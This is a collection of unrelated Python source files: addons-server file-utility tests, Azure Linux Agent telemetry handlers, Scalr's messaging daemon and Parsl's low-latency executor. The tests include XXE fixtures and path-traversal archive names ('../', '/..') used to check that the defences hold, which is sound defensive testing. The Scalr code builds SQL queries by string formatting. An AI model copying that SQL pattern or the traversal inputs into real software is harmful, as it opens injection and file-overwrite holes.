def test_get_all_files_strip_prefix_no_prefix_silent():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
# strip_prefix alone doesn't do anything.
assert utils.get_all_files(tempdir, strip_prefix=tempdir) == [
os.path.join(tempdir, 'dir1'),
os.path.join(tempdir, 'dir1', 'foo2'),
os.path.join(tempdir, 'foo1'),
]
def test_get_all_files_prefix():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
# strip_prefix alone doesn't do anything.
assert utils.get_all_files(tempdir, prefix='/foo/bar') == [
'/foo/bar' + os.path.join(tempdir, 'dir1'),
'/foo/bar' + os.path.join(tempdir, 'dir1', 'foo2'),
'/foo/bar' + os.path.join(tempdir, 'foo1'),
]
def test_get_all_files_prefix_with_strip_prefix():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
# strip_prefix alone doesn't do anything.
result = utils.get_all_files(
tempdir, strip_prefix=tempdir, prefix='/foo/bar')
assert result == [
os.path.join('/foo', 'bar', 'dir1'),
os.path.join('/foo', 'bar', 'dir1', 'foo2'),
os.path.join('/foo', 'bar', 'foo1'),
]
def test_lock_with_lock_attained():
with utils.lock(settings.TMP_PATH, 'test-lock-lock2') as lock_attained:
assert lock_attained
@contextlib.contextmanager
def _run_lock_holding_process(lock_name, sleep):
def _other_process_holding_lock():
with utils.lock(settings.TMP_PATH, lock_name) as lock_attained:
assert lock_attained
time.sleep(sleep)
other_process = multiprocessing.Process(target=_other_process_holding_lock)
other_process.start()
# Give the process some time to acquire the lock
time.sleep(0.2)
yield other_process
other_process.join()
def test_lock_timeout():
with _run_lock_holding_process('test-lock-lock3', sleep=2):
# Waiting for 3 seconds allows us to attain the lock from the parent
# process.
lock = utils.lock(settings.TMP_PATH, 'test-lock-lock3', timeout=3)
with lock as lock_attained:
assert lock_attained
with _run_lock_holding_process('test-lock-lock3', sleep=2):
# Waiting only 1 second fails to acquire the lock
lock = utils.lock(settings.TMP_PATH, 'test-lock-lock3', timeout=1)
with lock as lock_attained:
assert not lock_attained
def test_parse_search_empty_shortname():
from olympia.files.tests.test_file_viewer import get_file
fname = get_file('search_empty_shortname.xml')
with pytest.raises(forms.ValidationError) as excinfo:
utils.parse_search(fname)
assert (
str(excinfo.value.message) ==
'Could not parse uploaded file, missing or empty <ShortName> element')
class TestResolvei18nMessage(object):
def test_no_match(self):
assert utils.resolve_i18n_message('foo', {}, '') == 'foo'
def test_locale_found(self):
messages = {
'de': {
'foo': {'message': 'bar'}
}
}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'de')
assert result == 'bar'
def test_uses_default_locale(self):
messages = {
'en-US': {
'foo': {'message': 'bar'}
}
}
result = utils.resolve_i18n_message(
'__MSG_foo__', messages, 'de', 'en')
assert result == 'bar'
def test_no_locale_match(self):
# Neither `locale` or `locale` are found, "message" is returned
# unchanged
messages = {
'fr': {
'foo': {'message': 'bar'}
}
}
result = utils.resolve_i18n_message(
'__MSG_foo__', messages, 'de', 'en')
assert result == '__MSG_foo__'
def test_field_not_set(self):
"""Make sure we don't fail on messages that are `None`
Fixes https://github.com/mozilla/addons-server/issues/3067
"""
result = utils.resolve_i18n_message(None, {}, 'de', 'en')
assert result is None
def test_field_no_string(self):
"""Make sure we don't fail on messages that are no strings"""
result = utils.resolve_i18n_message([], {}, 'de', 'en')
assert result == []
def test_corrects_locales(self):
messages = {
'en-US': {
'foo': {'message': 'bar'}
}
}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'en')
assert result == 'bar'
def test_ignore_wrong_format(self):
messages = {
'en-US': {
'foo': 'bar'
}
}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'en')
assert result == '__MSG_foo__'
class TestXMLVulnerabilities(TestCase):
"""Test a few known vulnerabilities to make sure
our defusedxml patching is applied automatically.
This doesn't replicate all defusedxml tests.
"""
def test_quadratic_xml(self):
quadratic_xml = os.path.join(
os.path.dirname(__file__), '..', 'fixtures', 'files',
'quadratic.xml')
with pytest.raises(forms.ValidationError) as exc:
utils.extract_search(quadratic_xml)
assert exc.value.message == u'OpenSearch: XML Security error.'
def test_general_entity_expansion_is_disabled(self):
zip_file = utils.SafeZip(os.path.join(
os.path.dirname(__file__), '..', 'fixtures', 'files',
'xxe-example-install.zip'))
# This asserts that the malicious install.rdf blows up with
# a parse error. If it gets as far as this specific parse error
# it means that the external entity was not processed.
#
# Before the patch in files/utils.py, this would raise an IOError
# from the test suite refusing to make an external HTTP request to
# the entity ref.
with pytest.raises(EntitiesForbidden):
utils.RDFExtractor(zip_file)
def test_lxml_XMLParser_no_resolve_entities(self):
with pytest.raises(NotSupportedError):
lxml.etree.XMLParser(resolve_entities=True)
# not setting it works
lxml.etree.XMLParser()
# Setting it explicitly to `False` is fine too.
lxml.etree.XMLParser(resolve_entities=False)
class TestGetBackgroundImages(TestCase):
file_obj = os.path.join(
settings.ROOT, 'src/olympia/devhub/tests/addons/static_theme.zip')
file_obj_dep = os.path.join(
settings.ROOT,
'src/olympia/devhub/tests/addons/static_theme_deprecated.zip')
def test_get_background_images(self):
data = {'images': {'theme_frame': 'weta.png'}}
images = utils.get_background_images(self.file_obj, data)
assert 'weta.png' in images
assert len(images.items()) == 1
assert len(images['weta.png']) == 126447
def test_get_background_deprecated(self):
data = {'images': {'headerURL': 'weta.png'}}
images = utils.get_background_images(self.file_obj_dep, data)
assert 'weta.png' in images
assert len(images.items()) == 1
assert len(images['weta.png']) == 126447
def test_get_background_images_no_theme_data_provided(self):
images = utils.get_background_images(self.file_obj, theme_data=None)
assert 'weta.png' in images
assert len(images.items()) == 1
assert len(images['weta.png']) == 126447
def test_get_background_images_missing(self):
data = {'images': {'theme_frame': 'missing_file.png'}}
images = utils.get_background_images(self.file_obj, data)
assert not images
def test_get_background_images_not_image(self):
self.file_obj = os.path.join(
settings.ROOT,
'src/olympia/devhub/tests/addons/static_theme_non_image.zip')
data = {'images': {'theme_frame': 'not_an_image.js'}}
images = utils.get_background_images(self.file_obj, data)
assert not images
def test_get_background_images_with_additional_imgs(self):
self.file_obj = os.path.join(
settings.ROOT,
'src/olympia/devhub/tests/addons/static_theme_tiled.zip')
data = {'images': {
'theme_frame': 'empty.png',
'additional_backgrounds': [
'transparent.gif', 'missing_&_ignored.png',
'weta_for_tiling.png']
}}
images = utils.get_background_images(self.file_obj, data)
assert len(images.items()) == 3
assert len(images['empty.png']) == 332
assert len(images['transparent.gif']) == 42
assert len(images['weta_for_tiling.png']) == 93371
# And again but only with the header image
images = utils.get_background_images(
self.file_obj, data, header_only=True)
assert len(images.items()) == 1
assert len(images['empty.png']) == 332
@pytest.mark.parametrize('value, expected', [
(1, '1/1/1'),
(1, '1/1/1'),
(12, '2/12/12'),
(123, '3/23/123'),
(123456789, '9/89/123456789'),
])
def test_id_to_path(value, expected):
assert utils.id_to_path(value) == expected
class TestSafeZip(TestCase):
def test_raises_error_for_invalid_webextension_xpi(self):
with pytest.raises(forms.ValidationError):
utils.SafeZip(get_addon_file('invalid_webextension.xpi'))
def test_raises_validation_error_when_uncompressed_size_is_too_large(self):
with override_settings(MAX_ZIP_UNCOMPRESSED_SIZE=1000):
with pytest.raises(forms.ValidationError):
# total uncompressed size of this xpi is: 2269 bytes
utils.SafeZip(get_addon_file(
'valid_firefox_and_thunderbird_addon.xpi'))
class TestArchiveMemberValidator(TestCase):
# We cannot easily test `archive_member_validator` so let's test
# `_validate_archive_member_name_and_size` instead.
def test_raises_when_filename_is_none(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size(None, 123)
def test_raises_when_filesize_is_none(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('filename', None)
def test_raises_when_filename_is_dot_dot_slash(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('../', 123)
def test_raises_when_filename_starts_with_slash(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('/..', 123)
def test_raises_when_filename_is_dot_dot(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('..', 123)
def test_does_not_raise_when_filename_is_dot_dot_extension(self):
utils._validate_archive_member_name_and_size('foo..svg', 123)
@override_settings(FILE_UNZIP_SIZE_LIMIT=100)
def test_raises_when_filesize_is_above_limit(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size(
'filename',
settings.FILE_UNZIP_SIZE_LIMIT + 100
)
|
send_telemetry_events.py | # Microsoft Azure Linux Agent
#
# Copyright 2020 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import threading
import time
import traceback
from azurelinuxagent.common import logger
from azurelinuxagent.common.event import add_event, WALAEventOperation
from azurelinuxagent.common.exception import ServiceStoppedError
from azurelinuxagent.common.future import ustr, Queue, Empty
from azurelinuxagent.common.interfaces import ThreadHandlerInterface
def get_send_telemetry_events_handler(protocol_util):
return SendTelemetryEventsHandler(protocol_util)
class SendTelemetryEventsHandler(ThreadHandlerInterface):
"""
This Handler takes care of sending all telemetry out of the agent to Wireserver. It sends out data as soon as
there's any data available in the queue to send.
"""
_THREAD_NAME = "SendTelemetryHandler"
_MAX_TIMEOUT = datetime.timedelta(seconds=5).seconds
_MIN_EVENTS_TO_BATCH = 30
_MIN_BATCH_WAIT_TIME = datetime.timedelta(seconds=5)
def __init__(self, protocol_util):
self._protocol = protocol_util.get_protocol()
self.should_run = True
self._thread = None
# We're using a Queue for handling the communication between threads. We plan to remove any dependency on the
# filesystem in the future and use add_event to directly queue events into the queue rather than writing to
# a file and then parsing it later.
# Once we move add_event to directly queue events, we need to add a maxsize here to ensure some limitations are
# being set (currently our limits are enforced by collector_threads but that would become obsolete once we
# start enqueuing events directly).
self._queue = Queue()
@staticmethod
def get_thread_name():
return SendTelemetryEventsHandler._THREAD_NAME
def run(self):
logger.info("Start SendTelemetryHandler service.")
self.start()
def is_alive(self):
return self._thread is not None and self._thread.is_alive()
def start(self):
self._thread = threading.Thread(target=self._process_telemetry_thread)
self._thread.setDaemon(True)
self._thread.setName(self.get_thread_name())
self._thread.start()
def stop(self):
"""
Stop server communication and join the thread to main thread.
"""
self.should_run = False
if self.is_alive():
self.join()
def join(self):
self._queue.join()
self._thread.join()
def stopped(self):
return not self.should_run
def enqueue_event(self, event):
# Add event to queue and set event
if self.stopped():
raise ServiceStoppedError("{0} is stopped, not accepting anymore events".format(self.get_thread_name()))
# Queue.put() can block if the queue is full which can be an uninterruptible wait. Blocking for a max of
# SendTelemetryEventsHandler._MAX_TIMEOUT seconds and raising a ServiceStoppedError to retry later.
# Todo: Queue.put() will only raise a Full exception if a maxsize is set for the Queue. Once some size
# limitations are set for the Queue, ensure to handle that correctly here.
try:
self._queue.put(event, timeout=SendTelemetryEventsHandler._MAX_TIMEOUT)
except Exception as error:
raise ServiceStoppedError(
"Unable to enqueue due to: {0}, stopping any more enqueuing until the next run".format(ustr(error)))
def _wait_for_event_in_queue(self):
"""
Wait for atleast one event in Queue or timeout after SendTelemetryEventsHandler._MAX_TIMEOUT seconds.
In case of a timeout, set the event to None.
:return: event if an event is added to the Queue or None to signify no events were added in queue.
This would raise in case of an error.
"""
try:
event = self._queue.get(timeout=SendTelemetryEventsHandler._MAX_TIMEOUT)
self._queue.task_done()
except Empty:
# No elements in Queue, return None
event = None
return event
def _process_telemetry_thread(self):
logger.info("Successfully started the {0} thread".format(self.get_thread_name()))
try:
# On demand wait, start processing as soon as there is any data available in the queue. In worst case,
# also keep checking every SendTelemetryEventsHandler._MAX_TIMEOUT secs to avoid uninterruptible waits.
# Incase the service is stopped but we have events in queue, ensure we send them out before killing the thread.
while not self.stopped() or not self._queue.empty():
first_event = self._wait_for_event_in_queue()
if first_event:
# Start processing queue only if first event is not None (i.e. Queue has atleast 1 event),
# else do nothing
self._send_events_in_queue(first_event)
except Exception as error:
err_msg = "An unknown error occurred in the {0} thread main loop, stopping thread. Error: {1}, Stack: {2}".format(
self.get_thread_name(), ustr(error), traceback.format_exc())
add_event(op=WALAEventOperation.UnhandledError, message=err_msg, is_success=False)
def _send_events_in_queue(self, first_event):
# Process everything in Queue
start_time = datetime.datetime.utcnow()
while not self.stopped() and (self._queue.qsize() + 1) < self._MIN_EVENTS_TO_BATCH and (
start_time + self._MIN_BATCH_WAIT_TIME) > datetime.datetime.utcnow():
# To promote batching, we either wait for atleast _MIN_EVENTS_TO_BATCH events or _MIN_BATCH_WAIT_TIME secs
# before sending out the first request to wireserver.
# If the thread is requested to stop midway, we skip batching and send whatever we have in the queue.
logger.verbose("Waiting for events to batch. Total events so far: {0}, Time elapsed: {1} secs",
self._queue.qsize()+1, (datetime.datetime.utcnow() - start_time).seconds)
time.sleep(1)
# Delete files after sending the data rather than deleting and sending
self._protocol.report_event(self._get_events_in_queue(first_event))
def _get_events_in_queue(self, first_event):
yield first_event
while not self._queue.empty():
try:
event = self._queue.get_nowait()
self._queue.task_done()
yield event
except Exception as error:
logger.error("Some exception when fetching event from queue: {0}, {1}".format(ustr(error),
traceback.format_exc())) |
msg_sender.py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013, 2014 Scalr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from gevent import monkey
monkey.patch_all()
import os
import sys
cwd = os.path.dirname(os.path.abspath(__file__))
scalrpy_dir = os.path.join(cwd, '..')
sys.path.insert(0, scalrpy_dir)
import time
import socket
import requests
import multiprocessing
from scalrpy.util import helper
from scalrpy.util import dbmanager
from scalrpy.util import cryptotool
from scalrpy.util import application
from scalrpy import LOG
from scalrpy import exceptions
helper.patch_gevent()
app = None
debug_rate_counter = 0
debug_rate_timestamp = time.time()
class MsgSender(application.ScalrIterationApplication):
nothing_todo_sleep = 5
def __init__(self, argv=None):
self.description = "Scalr messaging application"
super(MsgSender, self).__init__(argv=argv)
self.config.update({
'cratio': 120,
'pool_size': 250,
'interval': 1,
'workers': 1,
})
self.iteration_timeout = 180
self._db = None
self._pool = None
self._processing_messages = set()
self._limit = 1000
self._max_processing_messages = 1000
def configure(self):
helper.update_config(
self.scalr_config.get('msg_sender', {}), self.config)
helper.validate_config(self.config)
socket.setdefaulttimeout(self.config['instances_connection_timeout'])
self._db = dbmanager.ScalrDB(self.config['connections']['mysql'])
self._pool = helper.GPool(pool_size=self.config['pool_size'])
self._limit = self._max_processing_messages = min(1000, self.config['pool_size'])
def _encrypt(self, server_id, crypto_key, data, headers=None):
assert server_id, 'server_id'
assert crypto_key, 'scalarizr.key'
assert data, 'data to encrypt'
crypto_algo = dict(name="des_ede3_cbc", key_size=24, iv_size=8)
data = cryptotool.encrypt_scalarizr(crypto_algo, data, cryptotool.decrypt_key(crypto_key))
headers = headers or dict()
headers['X-Signature'], headers['Date'] = cryptotool.sign(data, crypto_key)
headers['X-Server-Id'] = server_id
return data, headers
def get_messages(self):
exclude = str(list(self._processing_messages))[1:-1]
if exclude:
exclude = 'AND m.messageid NOT IN ({})'.format(exclude)
query = (
"SELECT m.messageid message_id, m.server_id message_server_id, m.event_id, "
"m.message_format, m.handle_attempts, m.message, m.message_name, m.status, "
"s.server_id, s.farm_id, s.farm_roleid farm_role_id, s.remote_ip, s.local_ip, "
"s.platform, s.status server_status "
"FROM messages m "
"LEFT JOIN servers s ON m.server_id = s.server_id "
"WHERE m.type = 'out' "
"AND m.status = 0 "
"AND m.messageid IS NOT NULL "
"AND m.messageid != '' "
"AND m.message_version = 2 "
"AND m.dtlasthandleattempt < DATE_SUB(UTC_TIMESTAMP(), INTERVAL m.handle_attempts*{cratio} SECOND) "
"{exclude} "
"ORDER BY m.dtadded ASC "
"LIMIT {limit}"
).format(cratio=self.config['cratio'], exclude=exclude, limit=self._limit)
return self._db.execute(query)
def load_servers_data(self, messages):
props = ['scalarizr.ctrl_port', 'scalarizr.key']
self._db.load_server_properties(messages, props)
for message in messages:
if 'scalarizr.ctrl_port' not in message:
message['scalarizr.ctrl_port'] = 8013
if 'scalarizr.key' not in message:
message['scalarizr.key'] = None
self._db.load_vpc_settings(messages)
return message
def make_request(self, message):
data, headers = self._encrypt(
message['server_id'],
message['scalarizr.key'],
message['message'])
instances_connection_policy = self.scalr_config.get(message['platform'], {}).get(
'instances_connection_policy', self.scalr_config['instances_connection_policy'])
ip, port, proxy_headers = helper.get_szr_ctrl_conn_info(
message, instances_connection_policy)
headers.update(proxy_headers)
if not ip:
msg = "Unable to determine ip"
raise Exception(msg)
if message['message_format'] == 'json':
headers['Content-type'] = 'application/json'
url = 'http://%s:%s/%s' % (ip, port, 'control')
request = {
'url': url,
'data': data,
'headers': headers,
}
return request
def update(self, message):
try:
if message['status'] == 1:
if message['event_id']:
query = (
"UPDATE events "
"SET msg_sent = msg_sent + 1 "
"WHERE event_id = '{event_id}'"
).format(**message)
self._db.execute(query, retries=1)
if message['message_name'] == 'ExecScript':
query = "DELETE FROM messages WHERE messageid = '{message_id}'".format(**message)
self._db.execute(query, retries=1)
return
query = (
"UPDATE messages "
"SET status=1, message='', handle_attempts=handle_attempts+1, "
" dtlasthandleattempt=UTC_TIMESTAMP() "
"WHERE messageid='{message_id}'").format(**message)
else:
query = (
"UPDATE messages "
"SET status={status}, handle_attempts=handle_attempts+1, "
"dtlasthandleattempt=UTC_TIMESTAMP() "
"WHERE messageid='{message_id}'").format(**message)
self._db.execute(query, retries=1)
finally:
global debug_rate_counter
if message['message_id'] in self._processing_messages:
debug_rate_counter += 1
self._processing_messages.remove(message['message_id'])
def process_message(self, message):
try:
try:
request = self.make_request(message)
except:
message['status'] = 3
msg = "Make request failed, reason: {error}".format(error=helper.exc_info())
raise Exception(msg)
if not request['url']:
message['status'] = 3
msg = "Wrong request: {request}".format(request=request)
raise Exception(msg)
msg = "Send message: {message_id}, request: {request}"
msg = msg.format(
message_id=message['message_id'],
request={'url': request['url'], 'headers': request['headers']})
LOG.debug(msg)
r = requests.post(
request['url'],
data=request['data'],
headers=request['headers'],
timeout=self.config['instances_connection_timeout'])
if r.status_code != 201:
msg = "Bad response code: {code}".format(code=r.status_code)
raise Exception(msg)
message['status'] = 1
msg = "Delivery Ok, message: {message_id}"
msg = msg.format(**message)
LOG.debug(msg)
except:
if message['status'] == 0 and int(message['handle_attempts']) >= 2:
message['status'] = 3
msg = "Delivery failed, message: {message}"
message['scalarizr.key'] = '******'
message['message'] = '******'
msg = msg.format(message=message)
helper.handle_error(message=msg, level='warning')
self.update(message)
def do_iteration(self):
global debug_rate_counter
global debug_rate_timestamp
debug_rate_time = time.time() - debug_rate_timestamp
rate = round(debug_rate_counter / debug_rate_time, 2)
LOG.info('Average rate: %s, %s' % (rate, rate * 60))
debug_rate_counter = 0
debug_rate_timestamp = time.time()
while len(self._processing_messages) > self._max_processing_messages:
LOG.warning('Reached the limit of simultaneously processed messages')
time.sleep(1)
messages = self.get_messages()
messages = [m for m in messages if m['message_id'] not in self._processing_messages]
num, idx = int(self.config['workers']), int(self.config['index'])
def filter_messages(message):
if message.get('server_id') and message.get('farm_id'):
return int(message['farm_id']) % num == idx - 1
else:
return idx == 1
if num > 1:
messages = filter(filter_messages, messages)
if not messages:
time.sleep(self.nothing_todo_sleep)
return
self.load_servers_data(messages)
server_statuses = [
'Running',
'Initializing',
'Importing',
'Temporary',
'Pending terminate',
'Pending suspend',
]
for message in messages:
try:
self._processing_messages.add(message['message_id'])
if message.get('server_id') is None or \
message['server_status'] not in server_statuses or (
message['server_status'] in ('Pending terminate', 'Pending suspend') and
int(message['handle_attempts']) >= 1):
msg = (
"Server {message_server_id} doesn't exist or not in right status, "
"set message {message_id} status to 3").format(**message)
LOG.warning(msg)
message['status'] = 3
self._pool.wait()
self._pool.apply_async(self.update, (message,))
else:
self._pool.wait()
self._pool.apply_async(self.process_message, (message,))
except:
msg = "Unable to process message: {message_id}, reason: {error}"
msg = msg.format(message_id=message['message_id'], error=helper.exc_info())
LOG.warning(msg)
LOG.info('Messages still in processing: %s' % len(self._processing_messages))
def on_iteration_error(self):
self._pool.kill()
self._processing_messages = set()
def __call__(self):
workers = []
for worker_idx in range(1, self.config['workers'] + 1):
self.config['index'] = worker_idx
worker = multiprocessing.Process(target=super(MsgSender, self).__call__)
worker.start()
workers.append(worker)
for worker in workers:
worker.join()
def main():
global app
app = MsgSender()
try:
app.load_config()
app.configure()
app.run()
except exceptions.AlreadyRunningError:
LOG.info(helper.exc_info(where=False))
except (SystemExit, KeyboardInterrupt):
pass
except:
LOG.exception('Oops')
if __name__ == '__main__':
main()
|
executor.py | """LowLatencyExecutor for low latency task/lambda-function execution
"""
from concurrent.futures import Future
import logging
import threading
import queue
from multiprocessing import Process, Queue
from ipyparallel.serialize import pack_apply_message # ,unpack_apply_message
from ipyparallel.serialize import deserialize_object # ,serialize_object
from parsl.executors.low_latency import zmq_pipes
from parsl.executors.low_latency import interchange
from parsl.executors.errors import ScalingFailed, DeserializationError, BadMessage, UnsupportedFeatureError
from parsl.executors.status_handling import StatusHandlingExecutor
from parsl.utils import RepresentationMixin
from parsl.providers import LocalProvider
logger = logging.getLogger(__name__)
class LowLatencyExecutor(StatusHandlingExecutor, RepresentationMixin):
"""
TODO: docstring for LowLatencyExecutor
"""
def __init__(self,
label='LowLatencyExecutor',
provider=LocalProvider(),
launch_cmd=None,
address="127.0.0.1",
worker_port=None,
worker_port_range=(54000, 55000),
interchange_port_range=(55000, 56000),
# storage_access=None,
working_dir=None,
worker_debug=False,
workers_per_node=1,
# cores_per_worker=1.0,
managed=True
):
logger.debug("Initializing LowLatencyExecutor")
StatusHandlingExecutor.__init__(self, provider)
self.label = label
self.launch_cmd = launch_cmd
self.provider = provider
self.worker_debug = worker_debug
# self.storage_access = storage_access if storage_access is not None else []
# if len(self.storage_access) > 1:
# raise ConfigurationError('Multiple storage access schemes are not supported')
self.working_dir = working_dir
self.managed = managed
self.blocks = []
self.workers_per_node = workers_per_node
self._task_counter = 0
self.address = address
self.worker_port = worker_port
self.worker_port_range = worker_port_range
self.interchange_port_range = interchange_port_range
self.run_dir = '.'
# TODO: add debugging, logdir, other functionality to workers
if not launch_cmd:
self.launch_cmd = """lowlatency_worker.py -n {workers_per_node} --task_url={task_url} --logdir={logdir}"""
def start(self):
"""Create the Interchange process and connect to it.
"""
self.outgoing_q = zmq_pipes.TasksOutgoing(
"127.0.0.1", self.interchange_port_range)
self.incoming_q = zmq_pipes.ResultsIncoming(
"127.0.0.1", self.interchange_port_range)
self.is_alive = True
self._queue_management_thread = None
self._start_queue_management_thread()
self._start_local_queue_process()
logger.debug("Created management thread: {}"
.format(self._queue_management_thread))
if self.provider:
# debug_opts = "--debug" if self.worker_debug else ""
l_cmd = self.launch_cmd.format( # debug=debug_opts,
task_url=self.worker_task_url,
workers_per_node=self.workers_per_node,
logdir="{}/{}".format(self.run_dir, self.label))
self.launch_cmd = l_cmd
logger.debug("Launch command: {}".format(self.launch_cmd))
self._scaling_enabled = True
logger.debug(
"Starting LowLatencyExecutor with provider:\n%s", self.provider)
if hasattr(self.provider, 'init_blocks'):
try:
for i in range(self.provider.init_blocks):
block = self.provider.submit(
self.launch_cmd, self.workers_per_node)
logger.debug("Launched block {}:{}".format(i, block))
if not block:
raise(ScalingFailed(self.provider.label,
"Attempts to provision nodes via provider has failed"))
self.blocks.extend([block])
except Exception as e:
logger.error("Scaling out failed: {}".format(e))
raise e
else:
self._scaling_enabled = False
logger.debug("Starting LowLatencyExecutor with no provider")
def _start_local_queue_process(self):
""" TODO: docstring """
comm_q = Queue(maxsize=10)
self.queue_proc = Process(target=interchange.starter,
args=(comm_q,),
kwargs={"client_ports": (self.outgoing_q.port,
self.incoming_q.port),
"worker_port": self.worker_port,
"worker_port_range": self.worker_port_range
# TODO: logdir and logging level
})
self.queue_proc.start()
try:
worker_port = comm_q.get(block=True, timeout=120)
logger.debug(
"Got worker port {} from interchange".format(worker_port))
except queue.Empty:
logger.error(
"Interchange has not completed initialization in 120s. Aborting")
raise Exception("Interchange failed to start")
self.worker_task_url = "tcp://{}:{}".format(
self.address, worker_port)
def _start_queue_management_thread(self):
""" TODO: docstring """
if self._queue_management_thread is None:
logger.debug("Starting queue management thread")
self._queue_management_thread = threading.Thread(
target=self._queue_management_worker)
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
logger.debug("Started queue management thread")
else:
logger.debug("Management thread already exists, returning")
def _queue_management_worker(self):
""" TODO: docstring """
logger.debug("[MTHREAD] queue management worker starting")
while not self.bad_state_is_set:
task_id, buf = self.incoming_q.get() # TODO: why does this hang?
msg = deserialize_object(buf)[0]
# TODO: handle exceptions
task_fut = self.tasks[task_id]
logger.debug("Got response for task id {}".format(task_id))
if "result" in msg:
task_fut.set_result(msg["result"])
elif "exception" in msg:
# TODO: handle exception
pass
elif 'exception' in msg:
logger.warning("Task: {} has returned with an exception")
try:
s, _ = deserialize_object(msg['exception'])
exception = ValueError("Remote exception description: {}".format(s))
task_fut.set_exception(exception)
except Exception as e:
# TODO could be a proper wrapped exception?
task_fut.set_exception(
DeserializationError("Received exception, but handling also threw an exception: {}".format(e)))
else:
raise BadMessage(
"Message received is neither result nor exception")
if not self.is_alive:
break
logger.info("[MTHREAD] queue management worker finished")
def submit(self, func, resource_specification, *args, **kwargs):
""" TODO: docstring """
if resource_specification:
logger.error("Ignoring the resource specification. "
"Parsl resource specification is not supported in LowLatency Executor. "
"Please check WorkQueueExecutor if resource specification is needed.")
raise UnsupportedFeatureError('resource specification', 'LowLatency Executor', 'WorkQueue Executor')
if self.bad_state_is_set:
raise self.executor_exception
self._task_counter += 1
task_id = self._task_counter
logger.debug(
"Pushing function {} to queue with args {}".format(func, args))
self.tasks[task_id] = Future()
fn_buf = pack_apply_message(func, args, kwargs,
buffer_threshold=1024 * 1024,
item_threshold=1024)
# Post task to the the outgoing queue
self.outgoing_q.put(task_id, fn_buf)
# Return the future
return self.tasks[task_id]
@property
def scaling_enabled(self):
return self._scaling_enabled
def scale_out(self, blocks=1):
"""Scales out the number of active workers by the number of blocks specified.
Parameters
----------
blocks : int
# of blocks to scale out. Default=1
Raises:
NotImplementedError
"""
r = []
for i in range(blocks):
if self.provider:
block = self.provider.submit(
self.launch_cmd, self.workers_per_node)
logger.debug("Launched block {}:{}".format(i, block))
if not block:
raise(ScalingFailed(self.provider.label,
"Attempts to provision nodes via provider has failed"))
self.blocks.extend([block])
else:
logger.error("No execution provider available")
r = None
return r
def scale_in(self, blocks):
"""Scale in the number of active blocks by specified amount.
The scale in method here is very rude. It doesn't give the workers
the opportunity to finish current tasks or cleanup. This is tracked
in issue #530
Raises:
NotImplementedError
"""
to_kill = self.blocks[:blocks]
if self.provider:
r = self.provider.cancel(to_kill)
return self._filter_scale_in_ids(to_kill, r)
def _get_job_ids(self):
return self.blocks
def shutdown(self, hub=True, targets='all', block=False):
"""Shutdown the executor, including all workers and controllers.
This is not implemented.
Kwargs:
- hub (Bool): Whether the hub should be shutdown, Default:True,
- targets (list of ints| 'all'): List of block id's to kill, Default:'all'
- block (Bool): To block for confirmations or not
Raises:
NotImplementedError
"""
logger.warning("Attempting LowLatencyExecutor shutdown")
# self.outgoing_q.close()
# self.incoming_q.close()
self.queue_proc.terminate()
logger.warning("Finished LowLatencyExecutor shutdown attempt")
return True
|
collect_telemetry_events.py | # Microsoft Azure Linux Agent
#
# Copyright 2020 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import json
import os
import re
import threading
import traceback
from collections import defaultdict
import azurelinuxagent.common.logger as logger
from azurelinuxagent.common import conf
from azurelinuxagent.common.agent_supported_feature import get_supported_feature_by_name, SupportedFeatureNames
from azurelinuxagent.common.event import EVENTS_DIRECTORY, TELEMETRY_LOG_EVENT_ID, \
TELEMETRY_LOG_PROVIDER_ID, add_event, WALAEventOperation, add_log_event, get_event_logger, \
CollectOrReportEventDebugInfo, EVENT_FILE_REGEX, parse_event
from azurelinuxagent.common.exception import InvalidExtensionEventError, ServiceStoppedError
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.interfaces import ThreadHandlerInterface
from azurelinuxagent.common.telemetryevent import TelemetryEvent, TelemetryEventParam, \
GuestAgentGenericLogsSchema, GuestAgentExtensionEventsSchema
from azurelinuxagent.ga.exthandlers import HANDLER_NAME_PATTERN
